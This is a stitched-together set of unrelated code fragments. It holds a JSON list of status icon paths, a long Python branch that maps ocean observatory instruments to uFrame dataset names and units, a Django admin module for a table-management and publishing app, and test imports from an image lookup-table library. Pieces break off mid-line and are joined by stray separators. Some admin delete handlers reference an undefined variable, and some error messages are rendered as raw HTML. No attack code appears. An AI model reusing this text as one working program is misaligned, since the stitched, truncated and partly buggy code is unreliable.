{
"url": "/images/status/paint-can--pencil.png",
"name": "paint-can--pencil"
},
{
"url": "/images/status/paint-can--plus.png",
"name": "paint-can--plus"
},
{
"url": "/images/status/paint-can-color.png",
"name": "paint-can-color"
},
{
"url": "/images/status/paint-can-paint-brush.png",
"name": "paint-can-paint-brush"
},
{
"url": "/images/status/paint-can.png",
"name": "paint-can"
},
{
"url": "/images/status/paint-tube--arrow.png",
"name": "paint-tube--arrow"
},
{
"url": "/images/status/paint-tube--exclamation.png",
"name": "paint-tube--exclamation"
},
{
"url": "/images/status/paint-tube--minus.png",
"name": "paint-tube--minus"
},
{
"url": "/images/status/paint-tube--pencil.png", | |
var_list[0].name = 'time'
var_list[1].name = 'parad_k_par'
var_list[2].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol photons m-2 s-1'
var_list[2].units = 'dbar'
elif platform_name == 'CP01CNPM' and node == 'PROFILER' and instrument_class == 'PARAD' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP01CNPM/WFP01/05-PARADK000/recovered_wfp/parad_k__stc_imodem_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'parad_k_par'
var_list[2].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol photons m-2 s-1'
var_list[2].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCI/SBS01/01-MOPAK0000/telemetered/mopak_o_dcl_accel'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CP02PMCI' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CP02PMCI/SBS01/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'FLORT' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCI/WFP01/04-FLORTK000/telemetered/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[6].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
var_list[6].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'FLORT' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCI/WFP01/04-FLORTK000/recovered_wfp/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[6].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
var_list[6].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'DOSTA' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCI/WFP01/02-DOFSTK000/telemetered/dofst_k_wfp_instrument'
var_list[0].name = 'time'
var_list[1].name = 'dofst_k_oxygen_l2'
var_list[2].name = 'dofst_k_oxygen'
var_list[3].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol/kg'
var_list[2].units = 'Hz'
var_list[3].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'DOSTA' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCI/WFP01/02-DOFSTK000/recovered_wfp/dofst_k_wfp_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'dofst_k_oxygen_l2'
var_list[2].name = 'dofst_k_oxygen'
var_list[3].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol/kg'
var_list[2].units = 'Hz'
var_list[3].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'VEL3D' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCI/WFP01/01-VEL3DK000/telemetered/vel3d_k_wfp_stc_instrument'
var_list[0].name = 'time'
var_list[1].name = 'vel3d_k_eastward_velocity'
var_list[2].name = 'vel3d_k_northward_velocity'
var_list[3].name = 'vel3d_k_upward_velocity'
var_list[4].name = 'vel3d_k_heading'
var_list[5].name = 'vel3d_k_pitch'
var_list[6].name = 'vel3d_k_roll'
var_list[7].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm/s'
var_list[2].units = 'm/s'
var_list[3].units = 'm/s'
var_list[4].units = 'ddegrees'
var_list[5].units = 'ddegrees'
var_list[6].units = 'ddegrees'
var_list[7].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'VEL3D' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCI/WFP01/01-VEL3DK000/recovered_wfp/vel3d_k_wfp_instrument'
var_list[0].name = 'time'
var_list[1].name = 'vel3d_k_eastward_velocity'
var_list[2].name = 'vel3d_k_northward_velocity'
var_list[3].name = 'vel3d_k_upward_velocity'
var_list[4].name = 'vel3d_k_heading'
var_list[5].name = 'vel3d_k_pitch'
var_list[6].name = 'vel3d_k_roll'
var_list[7].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm/s'
var_list[2].units = 'm/s'
var_list[3].units = 'm/s'
var_list[4].units = 'ddegrees'
var_list[5].units = 'ddegrees'
var_list[6].units = 'ddegrees'
var_list[7].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'CTD' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCI/WFP01/03-CTDPFK000/telemetered/ctdpf_ckl_wfp_instrument'
var_list[0].name = 'time'
var_list[1].name = 'ctdpf_ckl_seawater_temperature'
var_list[2].name = 'practical_salinity'
var_list[3].name = 'density'
var_list[4].name = 'ctdpf_ckl_seawater_pressure'
var_list[5].name = 'ctdpf_ckl_seawater_conductivity'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'degC'
var_list[2].units = 'unitless'
var_list[3].units = 'kg/m3'
var_list[4].units = 'dbar'
var_list[5].units = 'S/m'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'CTD' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCI/WFP01/03-CTDPFK000/recovered_wfp/ctdpf_ckl_wfp_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'ctdpf_ckl_seawater_temperature'
var_list[2].name = 'practical_salinity'
var_list[3].name = 'density'
var_list[4].name = 'ctdpf_ckl_seawater_pressure'
var_list[5].name = 'ctdpf_ckl_seawater_conductivity'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'degC'
var_list[2].units = 'unitless'
var_list[3].units = 'kg/m3'
var_list[4].units = 'dbar'
var_list[5].units = 'S/m'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'PARAD' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCI/WFP01/05-PARADK000/telemetered/parad_k__stc_imodem_instrument'
var_list[0].name = 'time'
var_list[1].name = 'parad_k_par'
var_list[2].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol photons m-2 s-1'
var_list[2].units = 'dbar'
elif platform_name == 'CP02PMCI' and node == 'PROFILER' and instrument_class == 'PARAD' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCI/WFP01/05-PARADK000/recovered_wfp/parad_k__stc_imodem_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'parad_k_par'
var_list[2].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol photons m-2 s-1'
var_list[2].units = 'dbar'
elif platform_name == 'CP02PMCO' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCO/SBS01/01-MOPAK0000/telemetered/mopak_o_dcl_accel'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CP02PMCO' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CP02PMCO/SBS01/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CP02PMCO' and node == 'PROFILER' and instrument_class == 'FLORT' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCO/WFP01/04-FLORTK000/telemetered/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[6].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
var_list[6].units = 'dbar'
elif platform_name == 'CP02PMCO' and node == 'PROFILER' and instrument_class == 'FLORT' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCO/WFP01/04-FLORTK000/recovered_wfp/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[6].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
var_list[6].units = 'dbar'
elif platform_name == 'CP02PMCO' and node == 'PROFILER' and instrument_class == 'DOSTA' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCO/WFP01/02-DOFSTK000/telemetered/dofst_k_wfp_instrument'
var_list[0].name = 'time'
var_list[1].name = 'dofst_k_oxygen_l2'
var_list[2].name = 'dofst_k_oxygen'
var_list[3].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol/kg'
var_list[2].units = 'Hz'
var_list[3].units = 'dbar'
elif platform_name == 'CP02PMCO' and node == 'PROFILER' and instrument_class == 'DOSTA' and method == 'RecoveredWFP':
uframe_dataset_name = 'CP02PMCO/WFP01/02-DOFSTK000/recovered_wfp/dofst_k_wfp_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'dofst_k_oxygen_l2'
var_list[2].name = 'dofst_k_oxygen'
var_list[3].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'umol/kg'
var_list[2].units = 'Hz'
var_list[3].units = 'dbar'
elif platform_name == 'CP02PMCO' and node == 'PROFILER' and instrument_class == 'VEL3D' and method == 'Telemetered':
uframe_dataset_name = 'CP02PMCO/WFP01/01-VEL3DK000/telemetered/vel3d_k_wfp_stc_instrument'
var_list[0].name = 'time'
var_list[1].name = 'vel3d_k_eastward_velocity'
var_list[2].name = 'vel3d_k_northward_velocity'
var_list[3].name = 'vel3d_k_upward_velocity'
var_list[4].name = 'vel3d_k_heading'
var_list[5].name = 'vel3d_k_pitch'
var_list[6].name = 'vel3d_k_roll'
var_list[7].name = 'int_ctd_pressure'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm/s'
var_list[2].units = 'm/s'
var_list[3].units = 'm/s'
var_list[4].units = 'ddegrees'
var_list[5].units = 'ddegrees'
var_list[6].units = 'ddegrees'
var_list[7].units | |
import traceback,sys
import hglib
import threading
import logging
from django.db import connection,transaction
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.utils.safestring import mark_safe
from django.utils import timezone
from reversion.admin import VersionAdmin
from tablemanager.models import (
ForeignTable, Input, NormalTable,
Normalise, Workspace, Publish,
Normalise_NormalTable,
PublishChannel,DataSource,DatasourceType
)
from tablemanager.forms import (
NormaliseForm,PublishForm,ForeignTableForm,
InputForm,NormalTableForm,WorkspaceForm,DataSourceForm,
PublishChannelForm,
)
from harvest.models import Job
from harvest.jobstates import JobState
from borg.admin import site
from harvest.jobstatemachine import JobStatemachine
from borg_utils.jobintervals import JobInterval
from borg_utils.borg_config import BorgConfiguration
from borg_utils.resource_status import ResourceStatus
from borg_utils.hg_batch_push import try_set_push_owner, try_clear_push_owner, increase_committed_changes, try_push_to_repository
logger = logging.getLogger(__name__)
def instantiate(modeladmin, request, queryset):
for table in queryset:
table.instantiate()
instantiate.short_description = "Create selected tables in database"
class JobFields(object):
def _job_status(self,o):
if o.job_id:
try:
j = Job.objects.get(pk=o.job_id)
state = JobState.get_jobstate(j.state)
if state.is_end_state:
return state.name
elif state.is_error_state:
return "Waiting approve" if state.is_interactive_state else "Error"
else:
return "running"
except:
return ""
else:
return ""
_job_status.short_description = "Job Status"
def _job_id(self,o):
if o.job_id:
return "<a href='/harvest/job/{0}/'>{0}</a>".format(o.job_id)
else:
return ''
_job_id.allow_tags = True
_job_id.short_description = "Job ID"
_job_id.admin_order_field = "job_id"
def _job_batch_id(self,o):
if o.job_batch_id:
return "<a href='/harvest/job/?q={0}'>{0}</a>".format(o.job_batch_id)
else:
return ''
_job_batch_id.allow_tags = True
_job_batch_id.short_description = "Job Batch ID"
_job_batch_id.admin_order_field = "job_batch_id"
def _job_message(self,o):
if o.job_message:
return "<p style='white-space:pre'>" + o.job_message + "</p>"
else:
return ''
_job_message.allow_tags = True
_job_message.short_description = "Job message"
class PublishChannelAdmin(VersionAdmin):
list_display = ("name", "sync_postgres_data","sync_geoserver_data","last_modify_time")
readonly_fields = ("last_modify_time",)
form = PublishChannelForm
def custom_delete_selected(self,request,queryset):
if request.POST.get('post') != 'yes':
#the confirm page, or user not confirmed
return self.default_delete_action[0](self,request,queryset)
#user confirm to delete the workspaces, execute the custom delete logic.
result = None
failed_publish_channels = []
try_set_push_owner("publish_channel_admin",enforce=True)
warning_message = None
try:
for publish_channel in queryset:
try:
with transaction.atomic():
publish_channel.delete()
except:
error = sys.exc_info()
failed_publish_channels.append((workspace.name,traceback.format_exception_only(error[0],error[1])))
#remove failed, continue to process the next publish_channel
continue
try:
try_push_to_repository('publish_channel_admin',enforce=True)
except:
error = sys.exc_info()
warning_message = traceback.format_exception_only(error[0],error[1])
logger.error(traceback.format_exc())
finally:
try_clear_push_owner("publish_channel_admin",enforce=True)
if failed_publish_channels or warning_message:
if failed_publish_channels:
if warning_message:
messages.warning(request, mark_safe("<ul><li>{0}</li><li>Some selected publish channels are deleted failed:<ul>{1}</ul></li></ul>".format(warning_message,"".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_publish_channels]))))
else:
messages.warning(request, mark_safe("Some selected publish channels are deleted failed:<ul>{0}</ul>".format("".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_publish_channels]))))
else:
messages.warning(request, mark_safe(warning_message))
else:
messages.success(request, "All selected publish channels are deleted successfully")
def get_actions(self, request):
#import ipdb;ipdb.set_trace()
actions = super(PublishChannelAdmin, self).get_actions(request)
self.default_delete_action = actions['delete_selected']
del actions['delete_selected']
actions['delete_selected'] = (PublishChannelAdmin.custom_delete_selected,self.default_delete_action[1],self.default_delete_action[2])
return actions
class DataSourceAdmin(VersionAdmin):
list_display = ("name","type", "last_modify_time")
search_fields = ["name"]
form = DataSourceForm
def get_fields(self, request, obj=None):
if ((obj.type if obj else request.POST.get("type")) == DatasourceType.DATABASE) :
base_fields = ["name","type","description","user","password","sql","vrt"]
else:
base_fields = ["name","type","description","vrt"]
return base_fields + list(self.get_readonly_fields(request, obj))
def custom_delete_selected(self,request,queryset):
if request.POST.get('post') != 'yes':
#the confirm page, or user not confirmed
return self.default_delete_action[0](self,request,queryset)
#user confirm to delete the workspaces, execute the custom delete logic.
result = None
failed_datasources = []
try_set_push_owner("datasource_admin",enforce=True)
warning_message = None
try:
for datasource in queryset:
try:
with transaction.atomic():
datasource.delete()
except:
error = sys.exc_info()
failed_datasources.append((workspace.name,traceback.format_exception_only(error[0],error[1])))
#remove failed, continue to process the next datasource
continue
try:
try_push_to_repository('datasource_admin',enforce=True)
except:
error = sys.exc_info()
warning_message = traceback.format_exception_only(error[0],error[1])
logger.error(traceback.format_exc())
finally:
try_clear_push_owner("datasource_admin",enforce=True)
if failed_datasources or warning_message:
if failed_datasources:
if warning_message:
messages.warning(request, mark_safe("<ul><li>{0}</li><li>Some selected datasources are deleted failed:<ul>{1}</ul></li></ul>".format(warning_message,"".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_datasources]))))
else:
messages.warning(request, mark_safe("Some selected datasources are deleted failed:<ul>{0}</ul>".format("".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_datasources]))))
else:
messages.warning(request, mark_safe(warning_message))
else:
messages.success(request, "All selected datasources are deleted successfully")
def get_actions(self, request):
#import ipdb;ipdb.set_trace()
actions = super(DataSourceAdmin, self).get_actions(request)
self.default_delete_action = actions['delete_selected']
del actions['delete_selected']
actions['delete_selected'] = (DataSourceAdmin.custom_delete_selected,self.default_delete_action[1],self.default_delete_action[2])
return actions
class WorkspaceAdmin(VersionAdmin):
list_display = ("name","_publish_channel","auth_level","_schema","_test_schema",)
readonly_fields = ("_schema","_view_schema","_test_schema","_test_view_schema")
#actions = [instantiate]
search_fields = ["name"]
form = WorkspaceForm
def _publish_channel(self,o):
return "<a href='/tablemanager/publishchannel/{0}/'>{1}</a>".format(o.publish_channel.pk,o.publish_channel)
_publish_channel.allow_tags = True
_publish_channel.short_description = "Publish channel"
def _schema(self,o):
return o.schema
_schema.short_description = "Schema"
def _view_schema(self,o):
return o.view_schema;
_view_schema.short_description = "View Schema"
def _test_schema(self,o):
return o.test_schema;
_test_schema.short_description = "Test Schema"
def _test_view_schema(self,o):
return o.test_view_schema;
_test_view_schema.short_description = "Test View Schema"
def custom_delete_selected(self,request,queryset):
if request.POST.get('post') != 'yes':
#the confirm page, or user not confirmed
return self.default_delete_action[0](self,request,queryset)
#user confirm to delete the workspaces, execute the custom delete logic.
result = None
failed_workspaces = []
try_set_push_owner("workspace_admin",enforce=True)
warning_message = None
try:
for workspace in queryset:
try:
with transaction.atomic():
workspace.delete()
except:
error = sys.exc_info()
failed_workspaces.append((workspace.name,traceback.format_exception_only(error[0],error[1])))
#remove failed, continue to process the next workspace
continue
try:
try_push_to_repository('workspace_admin',enforce=True)
except:
error = sys.exc_info()
warning_message = traceback.format_exception_only(error[0],error[1])
logger.error(traceback.format_exc())
finally:
try_clear_push_owner("workspace_admin",enforce=True)
if failed_workspaces or warning_message:
if failed_workspaces:
if warning_message:
messages.warning(request, mark_safe("<ul><li>{0}</li><li>Some selected workspaces are deleted failed:<ul>{1}</ul></li></ul>".format(warning_message,"".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_workspaces]))))
else:
messages.warning(request, mark_safe("Some selected workspaces are deleted failed:<ul>{0}</ul>".format("".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_workspaces]))))
else:
messages.warning(request, mark_safe(warning_message))
else:
messages.success(request, "All selected workspaces are deleted successfully")
def publish(self,request,queryset):
result = None
failed_objects = []
#import ipdb;ipdb.set_trace()
try_set_push_owner("workspace_admin",enforce=True)
warning_message = None
try:
for workspace in queryset:
try:
workspace.publish()
except:
error = sys.exc_info()
failed_objects.append((workspace.name,traceback.format_exception_only(error[0],error[1])))
#remove failed, continue to process the next publish
continue
try:
try_push_to_repository('workspace_admin',enforce=True)
except:
error = sys.exc_info()
warning_message = traceback.format_exception_only(error[0],error[1])
logger.error(traceback.format_exc())
finally:
try_clear_push_owner("workspace_admin",enforce=True)
if failed_objects or warning_message:
if failed_objects:
if warning_message:
messages.warning(request, mark_safe("<ul><li>{0}</li><li>Pushing changes to repository failed:<ul>{1}</ul></li></ul>".format(warning_message,"".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_objects]))))
else:
messages.warning(request, mark_safe("Publish failed for some selected workspaces:<ul>{0}</ul>".format("".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_objects]))))
else:
messages.warning(request, mark_safe(warning_message))
else:
messages.success(request, "Publish successfully for all selected workspaces")
publish.short_description = "Publish"
actions = ['publish']
def get_actions(self, request):
#import ipdb;ipdb.set_trace()
actions = super(WorkspaceAdmin, self).get_actions(request)
self.default_delete_action = actions['delete_selected']
del actions['delete_selected']
actions['delete_selected'] = (WorkspaceAdmin.custom_delete_selected,self.default_delete_action[1],self.default_delete_action[2])
return actions
class ForeignTableAdmin(VersionAdmin):
list_display = ("name","_server","last_modify_time")
readonly_fields = ("last_modify_time",)
#actions = [instantiate]
search_fields = ["name"]
form = ForeignTableForm
def _server(self,o):
return "<a href='/tablemanager/datasource/{0}/'>{1}</a>".format(o.server.pk,o.server.name)
_server.allow_tags = True
_server.short_description = "Server"
def custom_delete_selected(self,request,queryset):
if request.POST.get('post') != 'yes':
#the confirm page, or user not confirmed
return self.default_delete_action[0](self,request,queryset)
#user confirm to delete the foreign_tablees, execute the custom delete logic.
result = None
failed_foreign_tables = []
try_set_push_owner("foreign_table_admin",enforce=True)
warning_message = None
try:
for foreign_table in queryset:
try:
with transaction.atomic():
foreign_table.delete()
except:
error = sys.exc_info()
failed_foreign_tables.append((foreign_table.name,traceback.format_exception_only(error[0],error[1])))
#remove failed, continue to process the next foreign_table
continue
try:
try_push_to_repository('foreign_table_admin',enforce=True)
except:
error = sys.exc_info()
warning_message = traceback.format_exception_only(error[0],error[1])
logger.error(traceback.format_exc())
finally:
try_clear_push_owner("foreign_table_admin",enforce=True)
if failed_foreign_tables or warning_message:
if failed_foreign_tables:
if warning_message:
messages.warning(request, mark_safe("<ul><li>{0}</li><li>Some selected foreign tables are deleted failed:<ul>{1}</ul></li></ul>".format(warning_message,"".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_foreign_tables]))))
else:
messages.warning(request, mark_safe("Some selected foreign tables are deleted failed:<ul>{0}</ul>".format("".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_foreign_tables]))))
else:
messages.warning(request, mark_safe(warning_message))
else:
messages.success(request, "All selected foreign tables are deleted successfully")
def get_actions(self, request):
#import ipdb;ipdb.set_trace()
actions = super(ForeignTableAdmin, self).get_actions(request)
self.default_delete_action = actions['delete_selected']
del actions['delete_selected']
actions['delete_selected'] = (ForeignTableAdmin.custom_delete_selected,self.default_delete_action[1],self.default_delete_action[2])
return actions
def _up_to_date(o):
return o.is_up_to_date()
_up_to_date.short_description = "Up to date"
_up_to_date.boolean = True
class NormalTableAdmin(VersionAdmin):
list_display = ("name","_normalise","last_modify_time",_up_to_date)
#actions = [instantiate]
readonly_fields = ("_normalise","last_modify_time",_up_to_date)
search_fields = ["name"]
form = NormalTableForm
def _normalise(self,o):
if o.normalise:
return "<a href='/tablemanager/normalise/{0}/'>{1}</a>".format(o.normalise.pk,o.normalise)
else:
return ""
_normalise.allow_tags = True
_normalise.short_description = "Normalise"
def custom_delete_selected(self,request,queryset):
if request.POST.get('post') != 'yes':
#the confirm page, or user not confirmed
return self.default_delete_action[0](self,request,queryset)
#user confirm to delete the normal_tablees, execute the custom delete logic.
result = None
failed_normal_tables = []
try_set_push_owner("normal_table_admin",enforce=True)
warning_message = None
try:
for normal_table in queryset:
try:
with transaction.atomic():
normal_table.delete()
except:
error = sys.exc_info()
failed_normal_tables.append((normal_table.name,traceback.format_exception_only(error[0],error[1])))
#remove failed, continue to process the next normal_table
continue
try:
try_push_to_repository('normal_table_admin',enforce=True)
except:
error = sys.exc_info()
warning_message = traceback.format_exception_only(error[0],error[1])
logger.error(traceback.format_exc())
finally:
try_clear_push_owner("normal_table_admin",enforce=True)
if failed_normal_tables or warning_message:
if failed_normal_tables:
if warning_message:
messages.warning(request, mark_safe("<ul><li>{0}</li><li>Some selected normal tables are deleted failed:<ul>{1}</ul></li></ul>".format(warning_message,"".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_normal_tables]))))
else:
messages.warning(request, mark_safe("Some selected normal tables are deleted failed:<ul>{0}</ul>".format("".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_normal_tables]))))
else:
messages.warning(request, mark_safe(warning_message))
else:
messages.success(request, "All selected normal tables are deleted successfully")
def get_actions(self, request):
#import ipdb;ipdb.set_trace()
actions = super(NormalTableAdmin, self).get_actions(request)
self.default_delete_action = actions['delete_selected']
del actions['delete_selected']
actions['delete_selected'] = (NormalTableAdmin.custom_delete_selected,self.default_delete_action[1],self.default_delete_action[2])
return actions
class InputAdmin(VersionAdmin,JobFields):
list_display = ("name","_data_source", "geometry", "extent", "count","last_modify_time",_up_to_date,"_job_id", "_job_batch_id", "_job_status")
readonly_fields = ("spatial_info_desc","_style_file","title","abstract","_create_table_sql","ds_modify_time","last_modify_time",_up_to_date,"_job_batch_id","_job_id","_job_status","_job_message")
search_fields = ["name","data_source__name"]
form = InputForm
def get_fields(self, request, obj=None):
if (obj and hasattr(obj,"data_source")) or "data_source" in request.POST:
if (obj.data_source.type if obj else DataSource.objects.get(pk=int(request.POST.get("data_source"))).type) == DatasourceType.DATABASE:
if hasattr(obj,"foreign_table") if obj else "foreign_table" in request.POST:
base_fields = ["name","data_source","foreign_table","generate_rowid","source"]
else:
base_fields = ["name","data_source","foreign_table"]
else:
base_fields = ["name","data_source","generate_rowid","source"]
else:
base_fields = ["name","data_source"]
return base_fields + list(self.get_readonly_fields(request, obj))
def _data_source(self,o):
return "<a href='/tablemanager/datasource/{0}/'>{1}</a>".format(o.data_source.pk,o.data_source)
_data_source.allow_tags = True
_data_source.short_description = "Datasource"
def _style_file(self,o):
if o.style_file():
return o.style_file()
else:
return ""
_style_file.short_description = "Style file"
def _create_table_sql(self,o):
if o.create_table_sql:
return "<p style='white-space:pre'>" + o.create_table_sql + "</p>"
else:
return ''
_create_table_sql.allow_tags = True
_create_table_sql.short_description = "CREATE info for table"
def | |
<reponame>homm/pillow-lut-tools
from __future__ import division, unicode_literals, absolute_import
import warnings
from pillow_lut import operations, generators, ImageFilter, Image
from pillow_lut import (identity_table, transform_lut, resize_lut, amplify_lut,
sample_lut_linear, sample_lut_cubic)
from . import PillowTestCase, disable_numpy
